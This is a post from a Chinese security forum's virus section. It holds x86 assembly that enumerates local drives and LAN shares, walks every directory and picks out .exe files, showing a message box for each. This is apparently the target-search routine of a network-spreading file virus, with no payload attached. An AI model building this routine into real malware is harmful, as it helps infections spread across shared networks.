|
 | 作者: BrideX [bridex]
 论坛用户 |
登录 |
| include wap32.inc .386 .model flat,stdcall .data DirName db '*.*',0 NetDir db '\',0 NetFile db 'Temp.zip',0 .code extrn WNetOpenEnumA: proc extrn WNetEnumResourceA: proc extrn WNetCloseEnum: proc extrn FindFirstFileA: proc extrn FindNextFileA: proc extrn CloseHandle: proc extrn SetCurrentDirectoryA: proc extrn GetDriveTypeA: proc extrn MessageBoxA: proc extrn ExitProcess: proc Start: mov ecx,24 mov edx,"\:C" LoopKillDisk: push ecx push edx mov ebp,esp call GetDriveTypeA,ebp cmp eax,DRIVE_CDROM jz IsCdRom call EnumFileObject IsCdRom: pop edx inc edx pop ecx loop LoopKillDisk int 3 call EnumNetBoot call ExitProcess,0 EnumNetBoot proc ;列举网络Boot ;//开始列举网络资源 pushad mov ebp,NULL ;//列举网络, 从根开始 mov eax,RESOURCEUSAGE_CONTAINER mov ebx,OFF EnumNetWorkGroup call EnumNetObject popad ret EnumNetBoot endp EnumNetWorkGroup proc ;//列举工作组 ;ebp=父资源缓冲区 push ebx call DisplayMsg mov eax,RESOURCEUSAGE_CONTAINER mov ebx,OFF EnumNetComputer call EnumNetObject pop ebx ret EnumNetWorkGroup endp EnumNetComputer proc ;//列举网络计算机 ;ebp=父资源缓冲区 push ebx call DisplayMsg mov eax,RESOURCEUSAGE_CONTAINER mov ebx,OFF EnumNetComputerShareDir call EnumNetObject pop ebx ret EnumNetComputer endp EnumNetComputerShareDir proc ;//列举网络计算机共享目录 ;ebp=父资源缓冲区 push ebx call DisplayMsg mov eax,RESOURCEUSAGE_CONNECTABLE mov ebx,OFF DisplayMsg call EnumNetObject pop ebx ret EnumNetComputerShareDir endp DisplayMsg proc ;//显示列举出来的共享目录 push ebp mov eax,[ebp.lpRemoteName] mov ecx,[ebp.lpProvider] call MessageBoxA,NULL,eax,ecx,NULL mov ebp,[ebp.lpRemoteName] call EnumFileObject pop ebp ret DisplayMsg endp ;//用来列举局域网某种对象 EnumNetObject proc ;//eax=资源标志 ,ebx=找到对象后自动回调函数指针, ebp=父资源缓冲区 pushad push eax call WNetOpenEnumA,RESOURCE_GLOBALNET,RESOURCETYPE_DISK,eax,ebp,esp pop esi ;//弹出hEnum句柄,平衡堆栈 or eax,eax jnz short EnumNetObjectError mov edi,100h ;//划分堆栈空间大小 sub esp,edi mov ebp,esp ;//在堆栈中开辟缓冲区 LoopEnumNetObject: push L 1h ;//一次列举一个 mov eax,esp push edi ;//缓冲区大小(edi=100h) call WNetEnumResourceA,esi,eax,ebp,esp pop ecx pop ecx ;//平衡堆栈 or eax,eax jnz short EnumNetObjectOver call ebx ;//调用回调函数 jmp short LoopEnumNetObject EnumNetObjectOver: call WNetCloseEnum,esi add esp,edi EnumNetObjectError: popad ret EnumNetObject endp ;//用来列举本地目录/网络上某个共享目录 EnumFileObject proc ;ebp=父目录的缓冲区 pushad call SetCurrentDirectoryA,ebp ;设为当前目录 or eax,eax jz SetDirError mov edi,100h sub esp,edi ;//开辟200h字节的缓冲区 mov [esp],L 2a2e2ah ;//建立"*.*"字符串 mov eax,esp call FindFirstFileA,eax,esp mov esi,eax inc eax jz short EnumFileObjectError LoopEnumFileObject: call FindNextFileA,esi,esp or eax,eax jz short EnumFileObjectOver lea ebp,[esp.cFileName] mov eax,[esp.dwFileAttributes] and eax,10h ;//测试文件属性 jz short IsFileObject IsDirObject: ;//是一个目录 mov eax,[ebp] cmp al,'.' ;//测试是否点目录,是就不处理 jz short LoopEnumFileObject call EnumFileObject ;//递归调用 jmp short LoopEnumFileObject IsFileObject: ;//是一个文件 call FoundFileObject ;//整备该操作文件 jmp short LoopEnumFileObject EnumFileObjectOver: call CloseHandle,esi EnumFileObjectError: mov D [esp],L 2e2eh ;// 恢复原来的当前目录 建立字符串".." call SetCurrentDirectoryA,esp add esp,edi ;//平衡堆栈 SetDirError: popad ret EnumFileObject endp FoundFileObject proc ;//ebp=不带路径的文件名 pushad mov edi,ebp xor eax,eax LoopFindExtName: inc edi cmp [edi],al jnz LoopFindExtName mov eax,[edi-4] or eax,20202020h cmp eax,'exe.' jnz NotExeFile call MessageBoxA,NULL,ebp,ebp,NULL NotExeFile: popad ret FoundFileObject endp end Start 转自whg |
| 地主 发表时间: 04-05-23 17:20 |
| 回复: BrideX [bridex] 论坛用户 |
登录 |
|
是识别局网的exe文件 |
| B1层 发表时间: 04-05-23 17:24 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 局网EXE文件病毒识别技术